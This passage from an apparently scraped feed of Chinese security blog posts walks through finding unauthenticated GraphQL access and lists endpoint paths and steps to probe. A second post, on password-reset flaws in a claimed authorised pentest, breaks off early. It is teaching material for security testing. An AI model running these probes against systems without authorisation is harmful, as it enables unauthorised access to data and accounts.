deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}&#34;</span>}</span></code><br/></pre></p><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 80%;height: auto;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100017103" data-ratio="0.8959538" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="519" src="https://wechat2rss.xlab.app/img-proxy/?k=003aee17&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FDJX1rNqJe4lFX6pengvMtaJMm9vlNLg3Dm6zAo0SejajJfzTfU5Cz6Q8anvyOQJic1EECDfpxQqq057bs7k4lWzKwbxup6NKxVkSv6gbk1xQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">🔍 返回结果</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">成功返回接口结构数据。</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">⚠️ 这个时候其实已经可以确认：</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">👉 存在未授权访问</span></p></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 10px 0px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 5%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 4px 0px 10px;box-sizing: border-box;"><div style="display: inline-block;width: 27px;height: 27px;vertical-align: top;overflow: hidden;background-color: rgb(30, 30, 30);box-shadow: rgb(219, 219, 219) 7px 7px 0px 0px;box-sizing: border-box;"><div style="text-align: center;margin: 0px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3</span></p></div></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;padding: 0px 0px 0px 10px;border-style: solid;border-width: 0px 0px 1px;box-sizing: border-box;"><div style="font-size: 22px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">总结漏洞本质</span></p></div></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">如果总结一下，其实是三层问题叠加：</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">🧩 问题拆解</span></p></div><div style="margin: 20px 0%;box-sizing: border-box;"><div style="font-size: 14px;color: rgb(249, 110, 87);letter-spacing: 2px;line-height: 2.2;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">1️⃣ GraphQL introspection 未关闭</span></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">👉 可以直接获取接口结构</span></p></div><div style="margin: 20px 0%;box-sizing: border-box;"><div style="font-size: 14px;color: rgb(249, 110, 87);letter-spacing: 2px;line-height: 2.2;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2️⃣ 调试接口暴露</span></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">👉 console/playground 对外开放</span></p></div><div style="margin: 20px 0%;box-sizing: border-box;"><div style="font-size: 14px;color: rgb(249, 110, 87);letter-spacing: 2px;line-height: 2.2;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">3️⃣ 未做鉴权</span></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">👉 任何人都可以访问</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">📌 最终效果</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">👉 外部用户可以：</span></p></div><p style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">枚举接口</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">构造请求</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">直接调用</span></p></li></ul></p><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">整个挖掘流程</span></em></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">🧭 挖洞流程</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><span leaf="">功能点（删除地址）</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><span leaf="">       ↓</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><span leaf="">发现 /graphql</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><span leaf="">       ↓</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><span leaf="">发送 introspection 查询</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><span leaf="">       ↓</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><span leaf="">确认 GraphQL 开启</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><span leaf="">       ↓</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><span leaf="">扫描目录</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><span leaf="">       ↓</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><span leaf="">发现 console / playground</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><span leaf="">       ↓</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><span leaf="">直接访问接口</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><span leaf="">       ↓</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: center;"><span leaf="">未授权成功</span></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">这个思路可以怎么复用？</span></em></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这个案例最有价值的，其实不是漏洞本身，而是：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">一套可以复用的测试方法</span></strong></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">固定动作</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">现在只要看到这些：</span></p></div><p style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">/graphql</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">/api/graphql</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">/playground</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">/console</span></p></li></ul></p><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">做三件事：</span></p></div><div style="margin: 20px 0%;box-sizing: border-box;"><div style="font-size: 14px;color: rgb(249, 110, 87);letter-spacing: 2px;line-height: 2.2;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">1️⃣ 先打 introspection</span></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">判断：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">👉 能不能拿到 schema</span></p></div><div style="margin: 20px 0%;box-sizing: border-box;"><div style="font-size: 14px;color: rgb(249, 110, 87);letter-spacing: 2px;line-height: 2.2;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2️⃣ 扫目录</span></strong></p></div></div><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">找：</span></p><p style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">console</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">playground</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">版本接口</span></p></li></ul></p><div style="margin: 20px 0%;box-sizing: border-box;"><div style="font-size: 14px;color: rgb(249, 110, 87);letter-spacing: 2px;line-height: 2.2;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">3️⃣ 测未授权</span></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">直接发请求：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">👉 看是否需要登录</span></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">一个很重要的认知</span></em></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">做接口测试时，不要局限在：</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">参数</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">权限</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">越权</span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">接口文档本身，就是攻击面</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100012574" data-ratio="0.5493333333333333" data-s="300,640" data-w="750" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></li></ul><span leaf="">往期回顾</span><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=cfe146ed&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499439%26idx%3D1%26sn%3D4c8e9ff14aa181e4bea685213ff5031a">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 14 May 2026 10:00:00 +0800</pubDate>
    </item>
    <item>
      <title>任意用户密码重置</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499435&amp;idx=1&amp;sn=18c09fc83c9eb4d4c421cec6644fccb6</link>
      <description></description>
      <content:encoded><![CDATA[<p><span>pippybear</span> <span>2026-05-13 10:00</span> <span style="display: inline-block;">四川</span></p>




  <p>以下文章来源于：安全无界</p>
  <strong>安全无界</strong>
  <p>面向年轻的网络安全爱好者，分享网络安全技术、工具和趋势。</p>



  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=556c2ecb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F7xtecWUgCRx6Zclck2KaYoYs3NC4rp0quKpcMibmsPvS7zYz5uuuC8BHDDE02PE4RUKt8nXO1v7Or9wt9oiaV5e0bjfQvd0c3mG6wo66UMprg%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p style="margin-bottom: 24px;"><span leaf="">声明：请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。</span></p><p style="text-indent: 2em;margin-bottom: 24px;"><span leaf="">这是很久之前的一次授权渗透测试，测试目标是人才系统，细心的兄弟应该可以猜到，没错这就是上一个测试的续集，上次测试的时候系统还未完善，部分功能还没有上，这不整合着漏洞修复一起直接再来一次。</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001954" data-ratio="1.077922077922078" data-s="300,640" type="block" data-type="png" data-w="1078" style="width:339px;height:365px;" src="https://wechat2rss.xlab.app/img-proxy/?k=8e1aa073&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F72I8gAalpPXT6Hf98fMyVcKFnnK77gG9SRVlNiaJvaXpaMF3zxldrISbAXmjiaqXuqgPVLAc6kPcZ6ibq0UcQ7QtDJPTvIGArxgg8N8WZT2FdI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 24px;"><span leaf="">整体瞅了一眼，一目了然的多了一个找回密码的功能，emmmm，那还说啥直接优先对待。</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001962" data-ratio="0.8378378378378378" data-s="300,640" type="block" data-type="png" data-w="888" style="width:467px;height:391px;" src="https://wechat2rss.xlab.app/img-proxy/?k=a0f7b23f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F72I8gAalpPXc9L2fWL94drA0yT0ibDjic2c8nZLpc4gyVHpveyRLXUhM01bh90ibj41syNteo0EWfW2iaAF2jmzlykpYfbKwcCianmia0Qia1nk8TQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 24px;"><span leaf="">稍微回顾一下上文，注册的时候就包含身份证和密保问题，如下。</span></p><p style="margin-bottom: 24px;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-ratio="1.0468085106382978" style="width:512px;height:536px;" data-w="940" src="https://wechat2rss.xlab.app/img-proxy/?k=3d37e278&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F72I8gAalpPXibqxwW517rkmN4S5rDpm60U3I42HL1ZgpyUHPONJtliahq3c27GHk1FOUTmy5GibwwZZA1ersxT3xA1v7iclskSJgkqwozwGpJMM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-indent: 2em;margin-bottom: 24px;"><span leaf="">这不就简单了嘛，先直接用注册的信息，走通一下逻辑。成功进入到密码重置页面。</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001957" data-ratio="1.0380116959064327" data-s="300,640" type="block" data-type="png" data-w="684" style="width:465px;height:483px;" 